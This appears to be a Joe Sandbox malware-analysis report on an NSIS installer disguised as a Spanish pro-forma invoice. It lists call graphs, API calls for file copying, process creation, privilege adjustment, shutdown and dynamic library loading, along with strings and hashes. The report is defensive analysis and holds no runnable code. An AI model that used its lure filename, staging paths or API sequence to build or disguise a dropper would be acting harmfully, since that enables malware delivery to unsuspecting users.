4775 4034be 4751->4775 4752->4751 4785 4034d4 SetFilePointer 4752->4785 4756 40333a GetTickCount 4767 40334d 4756->4767 4757 40345e 4758 403462 4757->4758 4762 40347a 4757->4762 4760 4034be ReadFile 4758->4760 4759 403448 4759->4740 4760->4759 4761 4034be ReadFile 4761->4762 4762->4759 4762->4761 4764 4060e3 WriteFile 4762->4764 4763 4034be ReadFile 4763->4767 4764->4762 4766 4033b3 GetTickCount 4766->4767 4767->4759 4767->4763 4767->4766 4768 4033dc MulDiv wsprintfW 4767->4768 4770 4060e3 WriteFile 4767->4770 4778 406ab0 4767->4778 4769 4055c6 28 API calls 4768->4769 4769->4767 4770->4767 4772 4063eb 4771->4772 4773 4024db 4772->4773 4774 4063f6 RegCreateKeyExW 4772->4774 4773->4736 4773->4737 4773->4738 4774->4773 4776 4060b4 ReadFile 4775->4776 4777 403328 4776->4777 4777->4756 4777->4757 4777->4759 4779 406ad5 4778->4779 4780 406add 4778->4780 4779->4767 4780->4779 4781 406b64 GlobalFree 4780->4781 4782 406b6d GlobalAlloc 4780->4782 4783 406be4 GlobalAlloc 4780->4783 4784 406bdb GlobalFree 4780->4784 4781->4782 4782->4779 4782->4780 4783->4779 4783->4780 4784->4783 4785->4751 4786 402930 4787 402dcb 21 API calls 4786->4787 4788 402937 FindFirstFileW 4787->4788 4789 40294a 4788->4789 4790 40295f 4788->4790 4791 402968 4790->4791 4794 406488 wsprintfW 4790->4794 4795 406541 lstrcpynW 4791->4795 4794->4791 4795->4789 5967 404630 lstrlenW 5968 404651 WideCharToMultiByte 5967->5968 5969 40464f 5967->5969 5969->5968 5970 401931 5971 401968 5970->5971 5972 402dcb 21 API calls 5971->5972 5973 40196d 5972->5973 5974 405c4d 71 API calls 5973->5974 5975 401976 5974->5975 5976 4049b1 5977 4049dd 5976->5977 5978 4049ee 5976->5978 6037 405b85 GetDlgItemTextW 5977->6037 5980 4049fa GetDlgItem 5978->5980 5987 404a59 5978->5987 5985 404a0e 5980->5985 5981 4049e8 5982 4067ef 5 API calls 5981->5982 5982->5978 5983 404b3d 5986 404cec 5983->5986 6039 405b85 GetDlgItemTextW 5983->6039 5984 404a22 SetWindowTextW 5991 4044c0 22 API calls 5984->5991 5985->5984 5990 405ebb 4 API calls 5985->5990 5989 404527 8 API calls 5986->5989 5987->5983 5987->5986 5992 40657e 21 API calls 5987->5992 5994 404d00 5989->5994 5995 404a18 5990->5995 5996 404a3e 5991->5996 5997 404acd SHBrowseForFolderW 5992->5997 5993 404b6d 5998 405f18 18 API calls 5993->5998 5995->5984 6004 405e10 3 API calls 5995->6004 5999 4044c0 22 API calls 5996->5999 5997->5983 6000 404ae5 CoTaskMemFree 5997->6000 6001 404b73 5998->6001 6002 404a4c 5999->6002 6003 405e10 3 API calls 6000->6003 6040 406541 lstrcpynW 6001->6040 6038 4044f5 SendMessageW 6002->6038 6006 404af2 6003->6006 6004->5984 6009 404b29 SetDlgItemTextW 6006->6009 6013 40657e 21 API calls 6006->6013 6008 404a52 6011 406935 5 API calls 6008->6011 6009->5983 6010 404b8a 6012 406935 5 API calls 6010->6012 6011->5987 6020 404b91 6012->6020 6014 404b11 lstrcmpiW 6013->6014 6014->6009 6017 404b22 lstrcatW 6014->6017 6015 404bd2 6041 406541 lstrcpynW 6015->6041 6017->6009 6018 404bd9 6019 405ebb 4 API calls 6018->6019 6021 404bdf GetDiskFreeSpaceW 6019->6021 6020->6015 6024 405e5c 2 API calls 6020->6024 6026 404c2a 6020->6026 6023 404c03 MulDiv 6021->6023 6021->6026 6023->6026 6024->6020 6025 404c9b 6028 404cbe 6025->6028 6030 40140b 2 API calls 6025->6030 6026->6025 6027 404e36 24 API calls 6026->6027 6029 404c88 6027->6029 6042 4044e2 KiUserCallbackDispatcher 6028->6042 6032 404c9d SetDlgItemTextW 6029->6032 6033 404c8d 6029->6033 6030->6028 6032->6025 6035 404d6d 24 API calls 6033->6035 6034 404cda 6034->5986 6036 40490a SendMessageW 6034->6036 6035->6025 6036->5986 6037->5981 6038->6008 6039->5993 6040->6010 6041->6018 6042->6034 6043 707e170d 6044 707e15b6 GlobalFree 6043->6044 6047 707e1725 6044->6047 6045 707e176b GlobalFree 6046 707e1740 6046->6045 6047->6045 6047->6046 6048 707e1757 VirtualFree 6047->6048 6048->6045 6049 401934 6050 402dcb 21 API calls 6049->6050 6051 40193b 6050->6051 6052 405ba1 MessageBoxIndirectW 6051->6052 6053 401944 6052->6053 4862 4028b6 4863 4028bd 4862->4863 4865 402bce 4862->4865 4864 402da9 21 API calls 4863->4864 4866 4028c4 4864->4866 4867 4028d3 SetFilePointer 4866->4867 4867->4865 4868 4028e3 4867->4868 4870 406488 wsprintfW 4868->4870 4870->4865 6054 401f37 6055 402dcb 21 API calls 6054->6055 6056 401f3d 6055->6056 6057 402dcb 21 API calls 6056->6057 6058 401f46 6057->6058 6059 402dcb 21 API calls 6058->6059 6060 401f4f 6059->6060 6061 402dcb 21 API calls 6060->6061 6062 401f58 6061->6062 6063 401423 28 API calls 6062->6063 6064 401f5f 6063->6064 6071 405b67 ShellExecuteExW 6064->6071 6066 401fa7 6067 4069e0 5 API calls 6066->6067 6069 402953 6066->6069 6068 401fc4 CloseHandle 6067->6068 6068->6069 6071->6066 6072 4014b8 6073 4014be 6072->6073 6074 401389 2 API calls 6073->6074 6075 4014c6 6074->6075 6076 402fb8 6077 402fe3 6076->6077 6078 402fca SetTimer 6076->6078 6079 403038 6077->6079 6080 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 6077->6080 6078->6077 6080->6079 6081 40553a 6082 40554a 6081->6082 6083 40555e 6081->6083 6084 405550 6082->6084 6093 4055a7 6082->6093 6085 405566 IsWindowVisible 6083->6085 6089 40557d 6083->6089 6087 40450c SendMessageW 6084->6087 6088 405573 6085->6088 6085->6093 6086 4055ac CallWindowProcW 6090 40555a 6086->6090 6087->6090 6091 404e7b 5 API calls 6088->6091 6089->6086 6092 404efb 4 API calls 6089->6092 6091->6089 6092->6093 6093->6086 6094 401d3c 6095 402da9 21 API calls 6094->6095 6096 401d42 IsWindow 6095->6096 6097 401a45 6096->6097 6098 707e1000 6099 707e101b 5 API calls 6098->6099 6100 707e1019 6099->6100

                                                  Executed Functions

                                                  Function 0040351C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 11 403603 5->11 8 40360f-403623 call 4068c5 lstrlenA 6->8 13 403625-403641 call 406935 * 3 8->13 11->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 25 40364b 21->25 25->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 38 4036f0-4036f5 36->38 39 4036f6-4036fa 36->39 47 403860-40387a DeleteFileW call 4030a2 37->47 48 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->48 38->39 41 403700-403706 39->41 42 4037bb-4037ca call 405e3d 39->42 45 403720-403759 41->45 46 403708-40370f 41->46 42->32 58 4037cc-4037cd 42->58 53 403776-4037b0 45->53 54 40375b-403760 45->54 51 403711-403714 46->51 52 403716 46->52 64 403880-403886 47->64 65 403a67-403a77 call 403b39 OleUninitialize 47->65 48->47 62 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 48->62 51->45 51->52 52->45 56 4037b2-4037b6 53->56 57 4037b8-4037ba 53->57 54->53 60 403762-40376a 54->60 56->57 63 4037dc-4037e9 call 406541 56->63 57->42 58->32 66 403771 60->66 67 40376c-40376f 60->67 62->47 62->65 63->37 70 40388c-403897 call 405e3d 64->70 71 40391f-403926 call 403c13 64->71 77 403a79-403a89 call 405ba1 ExitProcess 65->77 78 403a9d-403aa3 65->78 66->53 67->53 67->66 82 4038e5-4038ef 70->82 83 403899-4038ce 70->83 80 40392b-40392f 71->80 84 403b21-403b29 78->84 85 403aa5-403abb GetCurrentProcess OpenProcessToken 78->85 80->65 86 4038f1-4038ff call 405f18 82->86 87 403934-40395a call 405b0c lstrlenW call 406541 82->87 91 4038d0-4038d4 83->91 88 403b2b 84->88 89 403b2f-403b33 ExitProcess 84->89 92 403af1-403aff call 406935 85->92 93 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 85->93 86->65 105 403905-40391b call 406541 * 2 86->105 110 40396b-403983 87->110 111 40395c-403966 call 406541 87->111 88->89 96 4038d6-4038db 91->96 97 4038dd-4038e1 91->97 103 403b01-403b0b 92->103 104 403b0d-403b18 ExitWindowsEx 92->104 93->92 96->97 101 4038e3 96->101 97->91 97->101 101->82 103->104 107 403b1a-403b1c call 40140b 103->107 104->84 104->107 105->71 107->84 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 127 4039c9-4039cb 122->127 123->127 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 127->128 129 4039cd-4039d7 GetFileAttributesW 127->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 131 4039f8-403a03 129->131 132 4039d9-4039e2 DeleteFileW 129->132 131->116 133 403a05 131->133 132->131 135 4039e4-4039f6 call 405c4d 132->135 133->65 135->118 135->131 137->65 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040353F
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                  • OleInitialize.OLE32(00000000), ref: 0040365A
                                                  • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                  • GetCommandLineW.KERNEL32(Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000020,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                  • wsprintfW.USER32 ref: 0040399B
                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                    • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                    • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                    • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                    • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(77943420,00425F58,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00405F61,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                    • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                  • ExitProcess.KERNEL32 ref: 00403A89
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                  • ExitProcess.KERNEL32 ref: 00403B33
                                                    • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$1033$Baboodom111 Setup$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-701627914
                                                  • Opcode ID: daee1b245cf7e07369d61f24f389d4badec905710e97a29cd4a8bfd3b1e66271
                                                  • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                  • Opcode Fuzzy Hash: daee1b245cf7e07369d61f24f389d4badec905710e97a29cd4a8bfd3b1e66271
                                                  • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                  Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 171 40580b-40580e 152->171 172 4057ef-405809 SendMessageW * 2 152->172 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 157 40590b-405915 155->157 158 4058ef-4058f5 155->158 156->155 162 405917-40591d 157->162 163 40596b-40596f 157->163 160 405930-405939 call 404527 158->160 161 4058f7-405906 ShowWindow * 2 call 4044f5 158->161 175 40593e-405942 160->175 161->157 167 405945-405955 ShowWindow 162->167 168 40591f-40592b call 404499 162->168 163->160 165 405971-405977 163->165 165->160 173 405979-40598c SendMessageW 165->173 176 405965-405966 call 404499 167->176 177 405957-405960 call 4055c6 167->177 168->160 178 405810-40581c SendMessageW 171->178 179 40581e-405835 call 4044c0 171->179 172->171 180 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 173->180 181 405a8e-405a90 173->181 176->163 177->176 178->179 190 405837-40584b ShowWindow 179->190 191 40586b-40588c GetDlgItem SendMessageW 179->191 188 4059d2-4059e7 TrackPopupMenu 180->188 189 4059bf-4059cf GetWindowRect 180->189 181->175 188->181 192 4059ed-405a04 188->192 189->188 193 40585a 190->193 194 40584d-405858 ShowWindow 190->194 191->181 195 405892-4058aa SendMessageW * 2 191->195 196 405a09-405a24 SendMessageW 192->196 197 405860-405866 call 4044f5 193->197 194->197 195->181 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                  • GetClientRect.USER32(?,?), ref: 004057AF
                                                  • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405852
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                    • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                  • ShowWindow.USER32(00000000), ref: 004058FE
                                                  • ShowWindow.USER32(00010436,00000008), ref: 00405903
                                                  • ShowWindow.USER32(00000008), ref: 0040594D
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                  • CreatePopupMenu.USER32 ref: 00405992
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                  • GetWindowRect.USER32(?,?), ref: 004059C6
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                  • OpenClipboard.USER32(00000000), ref: 00405A27
                                                  • EmptyClipboard.USER32 ref: 00405A2D
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                  • CloseClipboard.USER32 ref: 00405A88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                  • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                  • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                  • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                                  Function 707E1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 707E12BB: GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 707E1D2D
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 707E1D75
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 707E1D7F
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1D92
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E74
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E79
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E2068
                                                  • lstrcpyW.KERNEL32(?,?), ref: 707E2222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 707E22A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 707E22B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 707E230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 707E2326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: ae0518f319a26c8f7b2da67dce7bb8a1830a02e92b0b2350b7df8cf5ffba484a
                                                  • Instruction ID: 3f564971f0f65c737d79f0fb748582f448a6e5248536dfa035fb7296b85d98bf
                                                  • Opcode Fuzzy Hash: ae0518f319a26c8f7b2da67dce7bb8a1830a02e92b0b2350b7df8cf5ffba484a
                                                  • Instruction Fuzzy Hash: 3622C171D0220ADFCB11CFA6C9866EDB7F9FB08315F2045AEE166E3290D7745A82DB50
                                                  Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 730 405c4d-405c73 call 405f18 733 405c75-405c87 DeleteFileW 730->733 734 405c8c-405c93 730->734 735 405e09-405e0d 733->735 736 405c95-405c97 734->736 737 405ca6-405cb6 call 406541 734->737 738 405db7-405dbc 736->738 739 405c9d-405ca0 736->739 743 405cc5-405cc6 call 405e5c 737->743 744 405cb8-405cc3 lstrcatW 737->744 738->735 742 405dbe-405dc1 738->742 739->737 739->738 745 405dc3-405dc9 742->745 746 405dcb-405dd3 call 40689e 742->746 747 405ccb-405ccf 743->747 744->747 745->735 746->735 754 405dd5-405de9 call 405e10 call 405c05 746->754 750 405cd1-405cd9 747->750 751 405cdb-405ce1 lstrcatW 747->751 750->751 753 405ce6-405d02 lstrlenW FindFirstFileW 750->753 751->753 755 405d08-405d10 753->755 756 405dac-405db0 753->756 770 405e01-405e04 call 4055c6 754->770 771 405deb-405dee 754->771 759 405d30-405d44 call 406541 755->759 760 405d12-405d1a 755->760 756->738 758 405db2 756->758 758->738 772 405d46-405d4e 759->772 773 405d5b-405d66 call 405c05 759->773 763 405d1c-405d24 760->763 764 405d8f-405d9f FindNextFileW 760->764 763->759 769 405d26-405d2e 763->769 764->755 768 405da5-405da6 FindClose 764->768 768->756 769->759 769->764 770->735 771->745 774 405df0-405dff call 4055c6 call 406301 771->774 772->764 775 405d50-405d59 call 405c4d 772->775 783 405d87-405d8a call 4055c6 773->783 784 405d68-405d6b 773->784 774->735 775->764 783->764 787 405d6d-405d7d call 4055c6 call 406301 784->787 788 405d7f-405d85 784->788 787->764 788->764
                                                  APIs
